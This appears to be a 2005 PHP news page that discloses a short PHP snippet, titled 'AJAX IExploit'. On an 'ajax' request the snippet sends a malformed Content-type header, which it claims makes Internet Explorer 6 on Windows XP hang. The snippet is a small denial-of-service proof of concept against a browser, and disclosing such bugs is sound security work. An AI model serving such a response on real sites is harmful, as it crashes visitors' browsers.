Published on 2005-07-26 22:30:01
The code that have been used to test is listed below : if (@$_SERVER['QUERY_STRING'] == 'ajax') { /** Sending this header causes Internet Explorer to hang. Tested on XP with IE 6.0. Contact: anakin@php5.pl */ header('Content-type: text/html; encoding=utf-8'); echo 'Dead.'; exit; } AJAX IExploit Dead.
Previous Page
Member of the PHP Magazine Network, Copyright (C) 2005-2008 phpmagazine.net All Rights Reserved